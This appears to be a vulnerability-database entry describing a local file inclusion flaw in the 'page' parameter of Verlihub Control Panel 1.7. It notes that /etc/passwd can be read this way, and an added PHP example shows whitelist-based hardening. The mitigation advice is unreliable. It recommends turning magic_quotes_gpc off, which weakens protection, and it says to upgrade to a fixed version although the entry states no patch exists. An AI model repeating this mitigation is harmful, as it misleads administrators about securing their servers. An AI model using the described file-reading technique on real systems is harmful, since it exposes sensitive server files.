Vendor: Verlihub Control Panel
By: Methodman
CVSS: N/A
Severity: HIGH
CWE: Local File Inclusion
Product Name: Verlihub Control Panel
Affected Version From: 1.7
Affected Version To: 1.7
Patch Exists: NO
Related CWE:
CPE:
Platforms Tested:
2007
Verlihub Control Panel v 1.7 PHP 4.x Local File Inclusion
The Verlihub Control Panel version 1.7 for PHP 4.x is vulnerable to Local File Inclusion. The vulnerability exists due to the lack of proper input validation in the 'page' parameter of the URL. An attacker can exploit this vulnerability by manipulating the 'page' parameter to include arbitrary local files, such as '/etc/passwd'. This can lead to unauthorized access to sensitive information on the server.
Mitigation:
To mitigate this vulnerability, it is recommended to upgrade to a newer version of the Verlihub Control Panel that has addressed this issue. Additionally, ensure that the 'magic_quotes_gpc' setting is set to 'Off' and the 'ini_set' function is disabled in the PHP configuration.
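The flaw class described above, with a hardened alternative, as an added example that is not Verlihub Control Panel source code. The page names, the `pages/` directory and the `resolve_page` helper are hypothetical, and the code targets current PHP rather than PHP 4.x.

```php
<?php
// Added illustration: hypothetical front controller, not Verlihub Control Panel source.

// Pattern that produces the flaw: request data becomes part of an include path.
//   include 'pages/' . $_GET['page'] . '.php';   // do not do this

// Hardened form: the request value is only ever a lookup key, never a path.
// Page names and file names below are constructed for the example.
const PAGES = [
    'home'  => 'home.php',
    'users' => 'users.php',
    'bans'  => 'bans.php',
];

function resolve_page($requested, string $baseDir): ?string
{
    // Reject arrays (?page[]=x) and anything that is not an exact known key.
    if (!is_string($requested) || !array_key_exists($requested, PAGES)) {
        return null;
    }
    // Defence in depth: the resolved file must exist and sit inside $baseDir,
    // even if the map is later edited carelessly or a symlink is planted.
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . PAGES[$requested]);
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

$file = resolve_page($_GET['page'] ?? 'home', __DIR__ . '/pages');
if ($file === null) {
    http_response_code(404);
    // json_encode keeps control characters out of the log line.
    error_log('rejected page parameter: ' . json_encode($_GET['page'] ?? null));
    exit('Page not found');
}
include $file;
```

Rejected values are logged, so repeated hits on this branch in the PHP error log are a usable signal that the parameter is being probed.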